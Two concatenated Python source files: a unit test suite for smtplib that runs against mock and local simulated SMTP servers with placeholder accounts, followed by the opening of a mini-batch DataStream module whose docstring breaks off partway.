test_smtplib.py
|
import asyncore
import email.mime.text
import email.utils
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(mock_socket.getdefaulttimeout() is None)
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(smtp.sock.gettimeout() is None)
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except IOError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
def tearDown(self):
smtplib.socket = socket
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
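        # Reply code 334 asks the client to continue the authentication
        # exchange (e.g. by answering a challenge), while 235 means the
        # authentication succeeded (see RFC 4954).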
if arg.strip().lower()=='cram-md5':
self.push('334 {}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(email)),
"ascii"))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
smtp.close()
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
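    # For reference, the LOGIN credential checked below is simply the base64
    # encoding of the password (a quick sketch, using only the standard
    # library):
    #
    #     >>> import base64
    #     >>> base64.b64encode(b'somepassword')
    #     b'c29tZXBhc3N3b3Jk'
    #
    # which, uppercased, matches `sim_auth_login_password` defined above.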
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_password, str(err))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials['cram-md5'], str(err))
smtp.close()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests)
if __name__ == '__main__':
test_main()
|
stream.py
|
import warnings
from logging import getLogger
from queue import Queue
from threading import Thread, Semaphore
from typing import *
import numpy as np
from ..typing_ import *
from ..utils import (minibatch_slices_iterator, AutoInitAndCloseable, NOT_SET,
GeneratorIterator, to_number_or_numpy)
__all__ = [
'DataStream', 'UserGeneratorDataStream',
'ArraysDataStream', 'IntSeqDataStream',
'GeneratorFactoryDataStream', 'GatherDataStream',
'MapperDataStream', 'ThreadingDataStream',
]
def map_to_tuple(fn: Callable[[Any], TObject], seq: Iterable[Any]):
return tuple(fn(s) for s in seq)
def to_data_shapes(data_shapes) -> Tuple[ArrayShape, ...]:
return map_to_tuple(lambda x: map_to_tuple(int, x), data_shapes)
def to_readonly_array(arr: Array) -> Array:
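    # Mark the array as read-only so that mini-batches handed out by a data
    # stream cannot be mutated in place by downstream consumers.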
arr = np.asarray(arr)
arr.setflags(write=False)
return arr
def ensure_batch_is_tuple(batch: Union[Array, ArrayTupleOrList]
) -> ArrayTuple:
if not isinstance(batch, (tuple, list)):
batch = (batch,)
else:
batch = tuple(batch)
return batch
class DataStream(object):
"""
Class to construct mini-batch data iterators.
Constructing Data Streams
=========================
All :class:`DataStream` subclasses shipped by `ml_essentials` can be
constructed via factory methods of this base class.
To construct a data stream from numpy arrays, you may:
>>> x = np.arange(5, dtype=np.int32)
>>> y = x ** 2
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
[3 4] [ 9 16]
    To construct an integer sequence data stream, you may:
>>> stream = DataStream.int_seq(start=1, stop=10, step=2, batch_size=3)
>>> for [a] in stream:
... print(a)
[1 3 5]
[7 9]
To gather multiple data streams into one, you may:
>>> stream_1 = DataStream.int_seq(5, batch_size=3)
>>> stream_2 = DataStream.int_seq(-5, step=-1, batch_size=3)
>>> for [a] in stream_1:
... print(a)
[0 1 2]
[3 4]
>>> for [b] in stream_2:
... print(b)
[ 0 -1 -2]
[-3 -4]
>>> stream = DataStream.gather([stream_1, stream_2])
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [ 0 -1 -2]
[3 4] [-3 -4]
To turn an arbitrary mini-batch generator factory function into a data
stream, you may:
>>> def data_generator():
... for i in range(2):
... yield np.arange(i * 3, (i + 1) * 3, dtype=np.int32)
>>> stream = DataStream.generator(data_generator)
>>> for [a] in stream:
... print(a)
[0 1 2]
[3 4 5]
or you may generate a tuple / list of arrays:
>>> def data_generator():
... for i in range(2):
... arr = np.arange(i * 3, (i + 1) * 3, dtype=np.int32)
... yield arr, arr ** 2 # or return [x + y, x * y]
